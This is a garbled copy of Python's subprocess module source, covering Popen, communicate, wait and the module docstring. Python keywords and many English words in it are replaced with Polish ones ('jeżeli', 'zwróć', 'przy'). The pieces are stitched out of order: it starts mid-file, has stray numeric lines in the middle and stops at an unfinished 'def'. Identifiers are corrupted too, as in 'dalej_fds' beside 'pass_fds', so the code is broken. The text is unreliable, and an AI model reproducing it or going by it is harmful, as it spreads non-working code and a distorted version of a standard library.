os.close(self._devnull) # Retain the process handle, but close the thread handle self._child_created = Prawda self._handle = Handle(hp) self.pid = pid _winapi.CloseHandle(ht) def _internal_poll(self, _deadstate=Nic, _WaitForSingleObject=_winapi.WaitForSingleObject, _WAIT_OBJECT_0=_winapi.WAIT_OBJECT_0, _GetExitCodeProcess=_winapi.GetExitCodeProcess): """Check jeżeli child process has terminated. Returns returncode attribute. This method jest called by __del__, so it can only refer to objects w its local scope. """ jeżeli self.returncode jest Nic: jeżeli _WaitForSingleObject(self._handle, 0) == _WAIT_OBJECT_0: self.returncode = _GetExitCodeProcess(self._handle) zwróć self.returncode def wait(self, timeout=Nic, endtime=Nic): """Wait dla child process to terminate. Returns returncode attribute.""" jeżeli endtime jest nie Nic: timeout = self._remaining_time(endtime) jeżeli timeout jest Nic: timeout_millis = _winapi.INFINITE inaczej: timeout_millis = int(timeout * 1000) jeżeli self.returncode jest Nic: result = _winapi.WaitForSingleObject(self._handle, timeout_millis) jeżeli result == _winapi.WAIT_TIMEOUT: podnieś TimeoutExpired(self.args, timeout) self.returncode = _winapi.GetExitCodeProcess(self._handle) zwróć self.returncode def _readerthread(self, fh, buffer): buffer.append(fh.read()) fh.close() def _communicate(self, input, endtime, orig_timeout): # Start reader threads feeding into a list hanging off of this # object, unless they've already been started. jeżeli self.stdout oraz nie hasattr(self, "_stdout_buff"): self._stdout_buff = [] self.stdout_thread = \ threading.Thread(target=self._readerthread, args=(self.stdout, self._stdout_buff)) self.stdout_thread.daemon = Prawda self.stdout_thread.start() jeżeli self.stderr oraz nie hasattr(self, "_stderr_buff"): self._stderr_buff = [] self.stderr_thread = \ threading.Thread(target=self._readerthread, args=(self.stderr, self._stderr_buff)) self.stderr_thread.daemon = Prawda self.stderr_thread.start() jeżeli self.stdin: self._stdin_write(input) # Wait dla the reader threads, albo time out. If we time out, the # threads remain reading oraz the fds left open w case the user # calls communicate again. jeżeli self.stdout jest nie Nic: self.stdout_thread.join(self._remaining_time(endtime)) jeżeli self.stdout_thread.is_alive(): podnieś TimeoutExpired(self.args, orig_timeout) jeżeli self.stderr jest nie Nic: self.stderr_thread.join(self._remaining_time(endtime)) jeżeli self.stderr_thread.is_alive(): podnieś TimeoutExpired(self.args, orig_timeout) # Collect the output z oraz close both pipes, now that we know # both have been read successfully. stdout = Nic stderr = Nic jeżeli self.stdout: stdout = self._stdout_buff self.stdout.close() jeżeli self.stderr: stderr = self._stderr_buff self.stderr.close() # All data exchanged. Translate lists into strings. jeżeli stdout jest nie Nic: stdout = stdout[0] jeżeli stderr jest nie Nic: stderr = stderr[0] zwróć (stdout, stderr) def send_signal(self, sig): """Send a signal to the process """ jeżeli sig == signal.SIGTERM: self.terminate() albo_inaczej sig == signal.CTRL_C_EVENT: os.kill(self.pid, signal.CTRL_C_EVENT) albo_inaczej sig == signal.CTRL_BREAK_EVENT: os.kill(self.pid, signal.CTRL_BREAK_EVENT) inaczej: podnieś ValueError("Unsupported signal: {}".format(sig)) def terminate(self): """Terminates the process """ spróbuj: _winapi.TerminateProcess(self._handle, 1) wyjąwszy PermissionError: # ERROR_ACCESS_DENIED (winerror 5) jest received when the # process already died. rc = _winapi.GetExitCodeProcess(self._handle) jeżeli rc == _winapi.STILL_ACTIVE: podnieś self.returncode = rc kill = terminate inaczej: # # POSIX methods # albo_inaczej stdin == DEVNULL: p2cread = self._get_devnull() albo_inaczej isinstance(stdin, int): p2cread = stdin inaczej: # Assuming file-like object p2cread = stdin.fileno() jeżeli stdout jest Nic: dalej albo_inaczej stdout == PIPE: c2pread, c2pwrite = os.pipe() albo_inaczej stdout == DEVNULL: c2pwrite = self._get_devnull() albo_inaczej isinstance(stdout, int): c2pwrite = stdout inaczej: # Assuming file-like object c2pwrite = stdout.fileno() jeżeli stderr jest Nic: dalej albo_inaczej stderr == PIPE: errread, errwrite = os.pipe() albo_inaczej stderr == STDOUT: errwrite = c2pwrite albo_inaczej stderr == DEVNULL: errwrite = self._get_devnull() albo_inaczej isinstance(stderr, int): errwrite = stderr inaczej: # Assuming file-like object errwrite = stderr.fileno() zwróć (p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite) def _execute_child(self, args, executable, preexec_fn, close_fds, dalej_fds, cwd, env, startupinfo, creationflags, shell, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite, restore_signals, start_new_session): """Execute program (POSIX version)""" jeżeli isinstance(args, (str, bytes)): args = [args] inaczej: args = list(args) jeżeli shell: args = ["/bin/sh", "-c"] + args jeżeli executable: args[0] = executable jeżeli executable jest Nic: executable = args[0] orig_executable = executable # For transferring possible exec failure z child to parent. # Data format: "exception name:hex errno:description" # Pickle jest nie used; it jest complex oraz involves memory allocation. errpipe_read, errpipe_write = os.pipe() # errpipe_write must nie be w the standard io 0, 1, albo 2 fd range. low_fds_to_close = [] dopóki errpipe_write < 3: low_fds_to_close.append(errpipe_write) errpipe_write = os.dup(errpipe_write) dla low_fd w low_fds_to_close: os.close(low_fd) spróbuj: spróbuj: # We must avoid complex work that could involve # malloc albo free w the child process to avoid # potential deadlocks, thus we do all this here. # oraz dalej it to fork_exec() jeżeli env jest nie Nic: env_list = [os.fsencode(k) + b'=' + os.fsencode(v) dla k, v w env.items()] inaczej: env_list = Nic # Use execv instead of execve. executable = os.fsencode(executable) jeżeli os.path.dirname(executable): executable_list = (executable,) inaczej: # This matches the behavior of os._execvpe(). executable_list = tuple( os.path.join(os.fsencode(dir), executable) dla dir w os.get_exec_path(env)) fds_to_keep = set(pass_fds) fds_to_keep.add(errpipe_write) self.pid = _posixsubprocess.fork_exec( args, executable_list, close_fds, sorted(fds_to_keep), cwd, env_list, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite, errpipe_read, errpipe_write, restore_signals, start_new_session, preexec_fn) self._child_created = Prawda w_końcu: # be sure the FD jest closed no matter what os.close(errpipe_write) # self._devnull jest nie always defined. devnull_fd = getattr(self, '_devnull', Nic) jeżeli p2cread != -1 oraz p2cwrite != -1 oraz p2cread != devnull_fd: os.close(p2cread) jeżeli c2pwrite != -1 oraz c2pread != -1 oraz c2pwrite != devnull_fd: os.close(c2pwrite) jeżeli errwrite != -1 oraz errread != -1 oraz errwrite != devnull_fd: os.close(errwrite) jeżeli devnull_fd jest nie Nic: os.close(devnull_fd) # Prevent a double close of these fds z __init__ on error. self._closed_child_pipe_fds = Prawda # Wait dla exec to fail albo succeed; possibly raising an # exception (limited w size) errpipe_data = bytearray() dopóki Prawda: part = os.read(errpipe_read, 50000) errpipe_data += part jeżeli nie part albo len(errpipe_data) > 50000: przerwij w_końcu: # be sure the FD jest closed no matter what os.close(errpipe_read) jeżeli errpipe_data: spróbuj: os.waitpid(self.pid, 0) wyjąwszy ChildProcessError: dalej spróbuj: exception_name, hex_errno, err_msg = ( errpipe_data.split(b':', 2)) wyjąwszy ValueError: exception_name = b'SubprocessError' hex_errno = b'0' err_msg = (b'Bad exception data z child: ' + repr(errpipe_data)) child_exception_type = getattr( builtins, exception_name.decode('ascii'), SubprocessError) err_msg = err_msg.decode(errors="surrogatepass") jeżeli issubclass(child_exception_type, OSError) oraz hex_errno: errno_num = int(hex_errno, 16) child_exec_never_called = (err_msg == "noexec") jeżeli child_exec_never_called: err_msg = "" jeżeli errno_num != 0: err_msg = os.strerror(errno_num) jeżeli errno_num == errno.ENOENT: jeżeli child_exec_never_called: # The error must be z chdir(cwd). err_msg += ': ' + repr(cwd) inaczej: err_msg += ': ' + repr(orig_executable) podnieś child_exception_type(errno_num, err_msg) podnieś child_exception_type(err_msg) def _handle_exitstatus(self, sts, _WIFSIGNALED=os.WIFSIGNALED, _WTERMSIG=os.WTERMSIG, _WIFEXITED=os.WIFEXITED, _WEXITSTATUS=os.WEXITSTATUS): """All callers to this function MUST hold self._waitpid_lock.""" # This method jest called (indirectly) by __del__, so it cannot # refer to anything outside of its local scope. jeżeli _WIFSIGNALED(sts): self.returncode = -_WTERMSIG(sts) albo_inaczej _WIFEXITED(sts): self.returncode = _WEXITSTATUS(sts) inaczej: # Should never happen podnieś SubprocessError("Unknown child exit status!") def _internal_poll(self, _deadstate=Nic, _waitpid=os.waitpid, _WNOHANG=os.WNOHANG, _ECHILD=errno.ECHILD): """Check jeżeli child process has terminated. Returns returncode attribute. This method jest called by __del__, so it cannot reference anything outside of the local scope (nor can any methods it calls). """ jeżeli self.returncode jest Nic: jeżeli nie self._waitpid_lock.acquire(Nieprawda): # Something inaczej jest busy calling waitpid. Don't allow two # at once. We know nothing yet. zwróć Nic spróbuj: jeżeli self.returncode jest nie Nic: zwróć self.returncode # Another thread waited. pid, sts = _waitpid(self.pid, _WNOHANG) jeżeli pid == self.pid: self._handle_exitstatus(sts) wyjąwszy OSError jako e: jeżeli _deadstate jest nie Nic: self.returncode = _deadstate albo_inaczej e.errno == _ECHILD: # This happens jeżeli SIGCLD jest set to be ignored albo # waiting dla child processes has otherwise been # disabled dla our process. This child jest dead, we # can't get the status. # http://bugs.python.org/issue15756 self.returncode = 0 w_końcu: self._waitpid_lock.release() zwróć self.returncode def _try_wait(self, wait_flags): """All callers to this function MUST hold self._waitpid_lock.""" spróbuj: (pid, sts) = os.waitpid(self.pid, wait_flags) wyjąwszy ChildProcessError: # This happens jeżeli SIGCLD jest set to be ignored albo waiting # dla child processes has otherwise been disabled dla our # process. This child jest dead, we can't get the status. pid = self.pid sts = 0 zwróć (pid, sts) def wait(self, timeout=Nic, endtime=Nic): """Wait dla child process to terminate. Returns returncode attribute.""" jeżeli self.returncode jest nie Nic: zwróć self.returncode # endtime jest preferred to timeout. timeout jest only used for # printing. jeżeli endtime jest nie Nic albo timeout jest nie Nic: jeżeli endtime jest Nic: endtime = _time() + timeout albo_inaczej timeout jest Nic: timeout = self._remaining_time(endtime) jeżeli endtime jest nie Nic: # Enter a busy loop jeżeli we have a timeout. This busy loop was # cribbed z Lib/threading.py w Thread.wait() at r71065. delay = 0.0005 # 500 us -> initial delay of 1 ms dopóki Prawda: jeżeli self._waitpid_lock.acquire(Nieprawda): spróbuj: jeżeli self.returncode jest nie Nic: przerwij # Another thread waited. (pid, sts) = self._try_wait(os.WNOHANG) assert pid == self.pid albo pid == 0 jeżeli pid == self.pid: self._handle_exitstatus(sts) przerwij w_końcu: self._waitpid_lock.release() remaining = self._remaining_time(endtime) jeżeli remaining <= 0: podnieś TimeoutExpired(self.args, timeout) delay = min(delay * 2, remaining, .05) time.sleep(delay) inaczej: dopóki self.returncode jest Nic: przy self._waitpid_lock: jeżeli self.returncode jest nie Nic: przerwij # Another thread waited. (pid, sts) = self._try_wait(0) # Check the pid oraz loop jako waitpid has been known to # zwróć 0 even without WNOHANG w odd situations. # http://bugs.python.org/issue14396. jeżeli pid == self.pid: self._handle_exitstatus(sts) zwróć self.returncode def _communicate(self, input, endtime, orig_timeout): jeżeli self.stdin oraz nie self._communication_started: # Flush stdio buffer. This might block, jeżeli the user has # been writing to .stdin w an uncontrolled fashion. self.stdin.flush() jeżeli nie input: self.stdin.close() stdout = Nic stderr = Nic # Only create this mapping jeżeli we haven't already. jeżeli nie self._communication_started: self._fileobj2output = {} jeżeli self.stdout: self._fileobj2output[self.stdout] = [] jeżeli self.stderr: self._fileobj2output[self.stderr] = [] jeżeli self.stdout: stdout = self._fileobj2output[self.stdout] jeżeli self.stderr: stderr = self._fileobj2output[self.stderr] self._save_input(input) jeżeli self._input: input_view = memoryview(self._input) przy _PopenSelector() jako selector: jeżeli self.stdin oraz input: selector.register(self.stdin, selectors.EVENT_WRITE) jeżeli self.stdout: selector.register(self.stdout, selectors.EVENT_READ) jeżeli self.stderr: selector.register(self.stderr, selectors.EVENT_READ) dopóki selector.get_map(): timeout = self._remaining_time(endtime) jeżeli timeout jest nie Nic oraz timeout < 0: podnieś TimeoutExpired(self.args, orig_timeout) ready = selector.select(timeout) self._check_timeout(endtime, orig_timeout) # XXX Rewrite these to use non-blocking I/O on the file # objects; they are no longer using C stdio! dla key, events w ready: jeżeli key.fileobj jest self.stdin: chunk = input_view[self._input_offset : self._input_offset + _PIPE_BUF] spróbuj: self._input_offset += os.write(key.fd, chunk) wyjąwszy BrokenPipeError: selector.unregister(key.fileobj) key.fileobj.close() inaczej: jeżeli self._input_offset >= len(self._input): selector.unregister(key.fileobj) key.fileobj.close() albo_inaczej key.fileobj w (self.stdout, self.stderr): data = os.read(key.fd, 32768) jeżeli nie data: selector.unregister(key.fileobj) key.fileobj.close() self._fileobj2output[key.fileobj].append(data) self.wait(timeout=self._remaining_time(endtime)) # All data exchanged. Translate lists into strings. jeżeli stdout jest nie Nic: stdout = b''.join(stdout) jeżeli stderr jest nie Nic: stderr = b''.join(stderr) # Translate newlines, jeżeli requested. # This also turns bytes into strings. jeżeli self.universal_newlines: jeżeli stdout jest nie Nic: stdout = self._translate_newlines(stdout, self.stdout.encoding) jeżeli stderr jest nie Nic: stderr = self._translate_newlines(stderr, self.stderr.encoding) zwróć (stdout, stderr) def _save_input(self, input): # This method jest called z the _communicate_with_*() methods # so that jeżeli we time out dopóki communicating, we can kontynuuj # sending input jeżeli we retry. jeżeli self.stdin oraz self._input jest Nic: self._input_offset = 0 self._input = input jeżeli self.universal_newlines oraz input jest nie Nic: self._input = self._input.encode(self.stdin.encoding) def send_signal(self, sig): """Send a signal to the process """ os.kill(self.pid, sig) def terminate(self): """Terminate the process przy SIGTERM """ self.send_signal(signal.SIGTERM) def kill(self): """Kill the process przy SIGKILL """ self.send_signal(signal.SIGKILL)
39.175141
91
0.5909
# subprocess - Subprocesses przy accessible I/O streams # # For more information about this module, see PEP 324. # # Copyright (c) 2003-2005 by Peter Astrand <astrand@lysator.liu.se> # # Licensed to PSF under a Contributor Agreement. # See http://www.python.org/2.4/license dla licensing details. r"""subprocess - Subprocesses przy accessible I/O streams This module allows you to spawn processes, connect to their input/output/error pipes, oraz obtain their zwróć codes. This module intends to replace several older modules oraz functions: os.system os.spawn* Information about how the subprocess module can be used to replace these modules oraz functions can be found below. Using the subprocess module =========================== This module defines one klasa called Popen: klasa Popen(args, bufsize=-1, executable=Nic, stdin=Nic, stdout=Nic, stderr=Nic, preexec_fn=Nic, close_fds=Prawda, shell=Nieprawda, cwd=Nic, env=Nic, universal_newlines=Nieprawda, startupinfo=Nic, creationflags=0, restore_signals=Prawda, start_new_session=Nieprawda, dalej_fds=()): Arguments are: args should be a string, albo a sequence of program arguments. The program to execute jest normally the first item w the args sequence albo string, but can be explicitly set by using the executable argument. On POSIX, przy shell=Nieprawda (default): In this case, the Popen class uses os.execvp() to execute the child program. args should normally be a sequence. A string will be treated jako a sequence przy the string as the only item (the program to execute). On POSIX, przy shell=Prawda: If args jest a string, it specifies the command string to execute through the shell. If args jest a sequence, the first item specifies the command string, oraz any additional items will be treated jako additional shell arguments. On Windows: the Popen klasa uses CreateProcess() to execute the child program, which operates on strings. If args jest a sequence, it will be converted to a string using the list2cmdline method. Please note that not all MS Windows applications interpret the command line the same way: The list2cmdline jest designed dla applications using the same rules jako the MS C runtime. bufsize will be supplied jako the corresponding argument to the io.open() function when creating the stdin/stdout/stderr pipe file objects: 0 means unbuffered (read & write are one system call oraz can zwróć short), 1 means line buffered, any other positive value means use a buffer of approximately that size. A negative bufsize, the default, means the system default of io.DEFAULT_BUFFER_SIZE will be used. stdin, stdout oraz stderr specify the executed programs' standard input, standard output oraz standard error file handles, respectively. Valid values are PIPE, an existing file descriptor (a positive integer), an existing file object, oraz Nic. PIPE indicates that a new pipe to the child should be created. With Nic, no redirection will occur; the child's file handles will be inherited z the parent. Additionally, stderr can be STDOUT, which indicates that the stderr data z the applications should be captured into the same file handle jako dla stdout. On POSIX, jeżeli preexec_fn jest set to a callable object, this object will be called w the child process just before the child jest executed. The use of preexec_fn jest nie thread safe, using it w the presence of threads could lead to a deadlock w the child process before the new executable is executed. If close_fds jest true, all file descriptors wyjąwszy 0, 1 oraz 2 will be closed before the child process jest executed. The default dla close_fds varies by platform: Always true on POSIX. Prawda when stdin/stdout/stderr are Nic on Windows, false otherwise. pass_fds jest an optional sequence of file descriptors to keep open between the parent oraz child. Providing any dalej_fds implicitly sets close_fds to true. jeżeli shell jest true, the specified command will be executed through the shell. If cwd jest nie Nic, the current directory will be changed to cwd before the child jest executed. On POSIX, jeżeli restore_signals jest Prawda all signals that Python sets to SIG_IGN are restored to SIG_DFL w the child process before the exec. Currently this includes the SIGPIPE, SIGXFZ oraz SIGXFSZ signals. This parameter does nothing on Windows. On POSIX, jeżeli start_new_session jest Prawda, the setsid() system call will be made in the child process prior to executing the command. If env jest nie Nic, it defines the environment variables dla the new process. If universal_newlines jest Nieprawda, the file objects stdin, stdout oraz stderr are opened jako binary files, oraz no line ending conversion jest done. If universal_newlines jest Prawda, the file objects stdout oraz stderr are opened jako a text file, but lines may be terminated by any of '\n', the Unix end-of-line convention, '\r', the old Macintosh convention albo '\r\n', the Windows convention. All of these external representations are seen jako '\n' by the Python program. Also, the newlines attribute of the file objects stdout, stdin oraz stderr are nie updated by the communicate() method. In either case, the process being communicated przy should start up expecting to receive bytes on its standard input oraz decode them with the same encoding they are sent in. The startupinfo oraz creationflags, jeżeli given, will be dalejed to the underlying CreateProcess() function. They can specify things such as appearance of the main window oraz priority dla the new process. (Windows only) This module also defines some shortcut functions: call(*popenargs, **kwargs): Run command przy arguments. Wait dla command to complete, then zwróć the returncode attribute. The arguments are the same jako dla the Popen constructor. Example: >>> retcode = subprocess.call(["ls", "-l"]) check_call(*popenargs, **kwargs): Run command przy arguments. Wait dla command to complete. If the exit code was zero then return, otherwise podnieś CalledProcessError. The CalledProcessError object will have the zwróć code w the returncode attribute. The arguments are the same jako dla the Popen constructor. Example: >>> subprocess.check_call(["ls", "-l"]) 0 getstatusoutput(cmd): Return (status, output) of executing cmd w a shell. Execute the string 'cmd' w a shell przy 'check_output' oraz zwróć a 2-tuple (status, output). Universal newlines mode jest used, meaning that the result przy be decoded to a string. A trailing newline jest stripped z the output. The exit status dla the command can be interpreted according to the rules dla the function 'wait'. Example: >>> subprocess.getstatusoutput('ls /bin/ls') (0, '/bin/ls') >>> subprocess.getstatusoutput('cat /bin/junk') (256, 'cat: /bin/junk: No such file albo directory') >>> subprocess.getstatusoutput('/bin/junk') (256, 'sh: /bin/junk: nie found') getoutput(cmd): Return output (stdout albo stderr) of executing cmd w a shell. Like getstatusoutput(), wyjąwszy the exit status jest ignored oraz the zwróć value jest a string containing the command's output. Example: >>> subprocess.getoutput('ls /bin/ls') '/bin/ls' check_output(*popenargs, **kwargs): Run command przy arguments oraz zwróć its output. If the exit code was non-zero it podnieśs a CalledProcessError. The CalledProcessError object will have the zwróć code w the returncode attribute oraz output w the output attribute. The arguments are the same jako dla the Popen constructor. Example: >>> output = subprocess.check_output(["ls", "-l", "/dev/null"]) There jest an additional optional argument, "input", allowing you to dalej a string to the subprocess's stdin. If you use this argument you may nie also use the Popen constructor's "stdin" argument. If universal_newlines jest set to Prawda, the "input" argument must be a string rather than bytes, oraz the zwróć value will be a string. Exceptions ---------- Exceptions podnieśd w the child process, before the new program has started to execute, will be re-raised w the parent. Additionally, the exception object will have one extra attribute called 'child_traceback', which jest a string containing traceback information z the child's point of view. The most common exception podnieśd jest OSError. This occurs, for example, when trying to execute a non-existent file. Applications should prepare dla OSErrors. A ValueError will be podnieśd jeżeli Popen jest called przy invalid arguments. Exceptions defined within this module inherit z SubprocessError. check_call() oraz check_output() will podnieś CalledProcessError jeżeli the called process returns a non-zero zwróć code. TimeoutExpired be podnieśd jeżeli a timeout was specified oraz expired. Security -------- Unlike some other popen functions, this implementation will never call /bin/sh implicitly. This means that all characters, including shell metacharacters, can safely be dalejed to child processes. Popen objects ============= Instances of the Popen klasa have the following methods: poll() Check jeżeli child process has terminated. Returns returncode attribute. wait() Wait dla child process to terminate. Returns returncode attribute. communicate(input=Nic) Interact przy process: Send data to stdin. Read data z stdout oraz stderr, until end-of-file jest reached. Wait dla process to terminate. The optional input argument should be data to be sent to the child process, albo Nic, jeżeli no data should be sent to the child. If the Popen instance was constructed przy universal_newlines set to Prawda, the input argument should be a string oraz will be encoded using the preferred system encoding (see locale.getpreferredencoding); jeżeli universal_newlines jest Nieprawda, the input argument should be a byte string. communicate() returns a tuple (stdout, stderr). Note: The data read jest buffered w memory, so do nie use this method jeżeli the data size jest large albo unlimited. The following attributes are also available: stdin If the stdin argument jest PIPE, this attribute jest a file object that provides input to the child process. Otherwise, it jest Nic. stdout If the stdout argument jest PIPE, this attribute jest a file object that provides output z the child process. Otherwise, it jest Nic. stderr If the stderr argument jest PIPE, this attribute jest file object that provides error output z the child process. Otherwise, it jest Nic. pid The process ID of the child process. returncode The child zwróć code. A Nic value indicates that the process hasn't terminated yet. A negative value -N indicates that the child was terminated by signal N (POSIX only). Replacing older functions przy the subprocess module ==================================================== In this section, "a ==> b" means that b can be used jako a replacement dla a. Note: All functions w this section fail (more albo less) silently if the executed program cannot be found; this module podnieśs an OSError exception. In the following examples, we assume that the subprocess module jest imported przy "z subprocess zaimportuj *". Replacing /bin/sh shell backquote --------------------------------- output=`mycmd myarg` ==> output = Popen(["mycmd", "myarg"], stdout=PIPE).communicate()[0] Replacing shell pipe line ------------------------- output=`dmesg | grep hda` ==> p1 = Popen(["dmesg"], stdout=PIPE) p2 = Popen(["grep", "hda"], stdin=p1.stdout, stdout=PIPE) output = p2.communicate()[0] Replacing os.system() --------------------- sts = os.system("mycmd" + " myarg") ==> p = Popen("mycmd" + " myarg", shell=Prawda) pid, sts = os.waitpid(p.pid, 0) Note: * Calling the program through the shell jest usually nie required. * It's easier to look at the returncode attribute than the exitstatus. A more real-world example would look like this: spróbuj: retcode = call("mycmd" + " myarg", shell=Prawda) jeżeli retcode < 0: print("Child was terminated by signal", -retcode, file=sys.stderr) inaczej: print("Child returned", retcode, file=sys.stderr) wyjąwszy OSError jako e: print("Execution failed:", e, file=sys.stderr) Replacing os.spawn* ------------------- P_NOWAIT example: pid = os.spawnlp(os.P_NOWAIT, "/bin/mycmd", "mycmd", "myarg") ==> pid = Popen(["/bin/mycmd", "myarg"]).pid P_WAIT example: retcode = os.spawnlp(os.P_WAIT, "/bin/mycmd", "mycmd", "myarg") ==> retcode = call(["/bin/mycmd", "myarg"]) Vector example: os.spawnvp(os.P_NOWAIT, path, args) ==> Popen([path] + args[1:]) Environment example: os.spawnlpe(os.P_NOWAIT, "/bin/mycmd", "mycmd", "myarg", env) ==> Popen(["/bin/mycmd", "myarg"], env={"PATH": "/usr/bin"}) """ zaimportuj sys _mswindows = (sys.platform == "win32") zaimportuj io zaimportuj os zaimportuj time zaimportuj signal zaimportuj builtins zaimportuj warnings zaimportuj errno z time zaimportuj monotonic jako _time # Exception classes used by this module. klasa SubprocessError(Exception): dalej klasa CalledProcessError(SubprocessError): """This exception jest podnieśd when a process run by check_call() albo check_output() returns a non-zero exit status. The exit status will be stored w the returncode attribute; check_output() will also store the output w the output attribute. """ def __init__(self, returncode, cmd, output=Nic, stderr=Nic): self.returncode = returncode self.cmd = cmd self.output = output self.stderr = stderr def __str__(self): zwróć "Command '%s' returned non-zero exit status %d" % (self.cmd, self.returncode) @property def stdout(self): """Alias dla output attribute, to match stderr""" zwróć self.output @stdout.setter def stdout(self, value): # There's no obvious reason to set this, but allow it anyway so # .stdout jest a transparent alias dla .output self.output = value klasa TimeoutExpired(SubprocessError): """This exception jest podnieśd when the timeout expires dopóki waiting dla a child process. """ def __init__(self, cmd, timeout, output=Nic, stderr=Nic): self.cmd = cmd self.timeout = timeout self.output = output self.stderr = stderr def __str__(self): zwróć ("Command '%s' timed out after %s seconds" % (self.cmd, self.timeout)) @property def stdout(self): zwróć self.output @stdout.setter def stdout(self, value): # There's no obvious reason to set this, but allow it anyway so # .stdout jest a transparent alias dla .output self.output = value jeżeli _mswindows: zaimportuj threading zaimportuj msvcrt zaimportuj _winapi klasa STARTUPINFO: dwFlags = 0 hStdInput = Nic hStdOutput = Nic hStdError = Nic wShowWindow = 0 inaczej: zaimportuj _posixsubprocess zaimportuj select zaimportuj selectors spróbuj: zaimportuj threading wyjąwszy ImportError: zaimportuj dummy_threading jako threading # When select albo poll has indicated that the file jest writable, # we can write up to _PIPE_BUF bytes without risk of blocking. # POSIX defines PIPE_BUF jako >= 512. _PIPE_BUF = getattr(select, 'PIPE_BUF', 512) # poll/select have the advantage of nie requiring any extra file # descriptor, contrarily to epoll/kqueue (also, they require a single # syscall). jeżeli hasattr(selectors, 'PollSelector'): _PopenSelector = selectors.PollSelector inaczej: _PopenSelector = selectors.SelectSelector __all__ = ["Popen", "PIPE", "STDOUT", "call", "check_call", "getstatusoutput", "getoutput", "check_output", "run", "CalledProcessError", "DEVNULL", "SubprocessError", "TimeoutExpired", "CompletedProcess"] # NOTE: We intentionally exclude list2cmdline jako it jest # considered an internal implementation detail. issue10838. jeżeli _mswindows: z _winapi zaimportuj (CREATE_NEW_CONSOLE, CREATE_NEW_PROCESS_GROUP, STD_INPUT_HANDLE, STD_OUTPUT_HANDLE, STD_ERROR_HANDLE, SW_HIDE, STARTF_USESTDHANDLES, STARTF_USESHOWWINDOW) __all__.extend(["CREATE_NEW_CONSOLE", "CREATE_NEW_PROCESS_GROUP", "STD_INPUT_HANDLE", "STD_OUTPUT_HANDLE", "STD_ERROR_HANDLE", "SW_HIDE", "STARTF_USESTDHANDLES", "STARTF_USESHOWWINDOW"]) klasa Handle(int): closed = Nieprawda def Close(self, CloseHandle=_winapi.CloseHandle): jeżeli nie self.closed: self.closed = Prawda CloseHandle(self) def Detach(self): jeżeli nie self.closed: self.closed = Prawda zwróć int(self) podnieś ValueError("already closed") def __repr__(self): zwróć "%s(%d)" % (self.__class__.__name__, int(self)) __del__ = Close __str__ = __repr__ # This lists holds Popen instances dla which the underlying process had nie # exited at the time its __del__ method got called: those processes are wait()ed # dla synchronously z _cleanup() when a new Popen object jest created, to avoid # zombie processes. _active = [] def _cleanup(): dla inst w _active[:]: res = inst._internal_poll(_deadstate=sys.maxsize) jeżeli res jest nie Nic: spróbuj: _active.remove(inst) wyjąwszy ValueError: # This can happen jeżeli two threads create a new Popen instance. # It's harmless that it was already removed, so ignore. dalej PIPE = -1 STDOUT = -2 DEVNULL = -3 # XXX This function jest only used by multiprocessing oraz the test suite, # but it's here so that it can be imported when Python jest compiled without # threads. def _args_from_interpreter_flags(): """Return a list of command-line arguments reproducing the current settings w sys.flags oraz sys.warnoptions.""" flag_opt_map = { 'debug': 'd', # 'inspect': 'i', # 'interactive': 'i', 'optimize': 'O', 'dont_write_bytecode': 'B', 'no_user_site': 's', 'no_site': 'S', 'ignore_environment': 'E', 'verbose': 'v', 'bytes_warning': 'b', 'quiet': 'q', 'hash_randomization': 'R', } args = [] dla flag, opt w flag_opt_map.items(): v = getattr(sys.flags, flag) jeżeli v > 0: jeżeli flag == 'hash_randomization': v = 1 # Handle specification of an exact seed args.append('-' + opt * v) dla opt w sys.warnoptions: args.append('-W' + opt) zwróć args def call(*popenargs, timeout=Nic, **kwargs): """Run command przy arguments. Wait dla command to complete albo timeout, then zwróć the returncode attribute. The arguments are the same jako dla the Popen constructor. Example: retcode = call(["ls", "-l"]) """ przy Popen(*popenargs, **kwargs) jako p: spróbuj: zwróć p.wait(timeout=timeout) wyjąwszy: p.kill() p.wait() podnieś def check_call(*popenargs, **kwargs): """Run command przy arguments. Wait dla command to complete. If the exit code was zero then return, otherwise podnieś CalledProcessError. The CalledProcessError object will have the zwróć code w the returncode attribute. The arguments are the same jako dla the call function. Example: check_call(["ls", "-l"]) """ retcode = call(*popenargs, **kwargs) jeżeli retcode: cmd = kwargs.get("args") jeżeli cmd jest Nic: cmd = popenargs[0] podnieś CalledProcessError(retcode, cmd) zwróć 0 def check_output(*popenargs, timeout=Nic, **kwargs): r"""Run command przy arguments oraz zwróć its output. If the exit code was non-zero it podnieśs a CalledProcessError. The CalledProcessError object will have the zwróć code w the returncode attribute oraz output w the output attribute. The arguments are the same jako dla the Popen constructor. Example: >>> check_output(["ls", "-l", "/dev/null"]) b'crw-rw-rw- 1 root root 1, 3 Oct 18 2007 /dev/null\n' The stdout argument jest nie allowed jako it jest used internally. To capture standard error w the result, use stderr=STDOUT. >>> check_output(["/bin/sh", "-c", ... "ls -l non_existent_file ; exit 0"], ... stderr=STDOUT) b'ls: non_existent_file: No such file albo directory\n' There jest an additional optional argument, "input", allowing you to dalej a string to the subprocess's stdin. If you use this argument you may nie also use the Popen constructor's "stdin" argument, as it too will be used internally. Example: >>> check_output(["sed", "-e", "s/foo/bar/"], ... input=b"when w the course of fooman events\n") b'when w the course of barman events\n' If universal_newlines=Prawda jest dalejed, the "input" argument must be a string oraz the zwróć value will be a string rather than bytes. """ jeżeli 'stdout' w kwargs: podnieś ValueError('stdout argument nie allowed, it will be overridden.') jeżeli 'input' w kwargs oraz kwargs['input'] jest Nic: # Explicitly dalejing input=Nic was previously equivalent to dalejing an # empty string. That jest maintained here dla backwards compatibility. kwargs['input'] = '' jeżeli kwargs.get('universal_newlines', Nieprawda) inaczej b'' zwróć run(*popenargs, stdout=PIPE, timeout=timeout, check=Prawda, **kwargs).stdout klasa CompletedProcess(object): """A process that has finished running. This jest returned by run(). Attributes: args: The list albo str args dalejed to run(). returncode: The exit code of the process, negative dla signals. stdout: The standard output (Nic jeżeli nie captured). stderr: The standard error (Nic jeżeli nie captured). """ def __init__(self, args, returncode, stdout=Nic, stderr=Nic): self.args = args self.returncode = returncode self.stdout = stdout self.stderr = stderr def __repr__(self): args = ['args={!r}'.format(self.args), 'returncode={!r}'.format(self.returncode)] jeżeli self.stdout jest nie Nic: args.append('stdout={!r}'.format(self.stdout)) jeżeli self.stderr jest nie Nic: args.append('stderr={!r}'.format(self.stderr)) zwróć "{}({})".format(type(self).__name__, ', '.join(args)) def 